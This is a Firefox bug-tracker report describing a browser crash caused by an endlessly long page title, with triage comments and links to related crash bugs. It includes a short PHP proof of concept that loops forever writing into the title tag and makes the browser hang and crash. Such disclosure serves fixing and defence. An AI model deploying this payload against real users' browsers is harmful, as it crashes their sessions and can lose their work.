Open Bug 1781147 Opened 2 years ago Updated 6 months ago

firefox denial-of-service triggered by infinitely long page title

Categories

(Core :: Graphics: WebRender, defect)

Product:
Core
Component:
Graphics: WebRender
Type:
defect

Tracking

()

People

(Reporter: pho.sco.glass, Unassigned)

References

(Blocks 2 open bugs)

Details

(Keywords: csectype-dos, reporter-external, Whiteboard: [reporter-external] [client-bounty-form] [verif?])

Firefox Broswer version 102.2.1 on Android 12

I am able to cause firefox to crash using the following code:

test.php -------

<!doctype html>
<html>
<head>
<title><?php for(;;){echo "a";}

Flags: sec-bounty?

--> Fenix for initial triage, given this was reported as a mobile bug.

Group: firefox-core-security → mobile-core-security
Component: Security → Security: Android
Product: Firefox → Fenix

This file looks incomplete, there is no closing php tag. The file looks to create an infinitely long title. This looks like a variation of bug 432687

Keywords: csectype-dos
Blocks: eviltraps
Group: mobile-core-security
Status: UNCONFIRMED → NEW
Ever confirmed: true

This file looks incomplete, there is no closing php tag.

The closing tag at the end of a PHP file is optional.

I tested this and reproduced on both Desktop and Android, which both become unresponsive and eventually crash. Ideally, a fix here shouldn't be mobile specific.

Component: Security: Android → Security
Product: Fenix → Core
Summary: firefox denial-of-service on mobile phone → firefox denial-of-service triggered by infinitely long page title

The severity field is not set for this bug.
:dveditz, could you have a look please?

For more information, please visit auto_nag documentation.

Flags: needinfo?(dveditz)
Component: Security → DOM: Core & HTML
Flags: sec-bounty?
Flags: sec-bounty-
Flags: needinfo?(dveditz)

Interestingly, on desktop this manages to crash the parent due to a too large IPC message. Let's start by addressing that, since it's arguably more severe than a content process reaching an nsString length limit or similar.
https://crash-stats.mozilla.org/report/index/3f5a8c49-46bc-40ff-92c7-cb3d60221124

Component: DOM: Core & HTML → Graphics: WebRender

The severity field is not set for this bug.
:gw, could you have a look please?

For more information, please visit auto_nag documentation.

Flags: needinfo?(gwatson)
Severity: -- → S3
Flags: needinfo?(gwatson)

From the crash stack this looks like it could be another instance of bug 1772994.

See Also: → 1772994
See Also: → 1827778
You need to log in before you can comment on or make changes to this bug.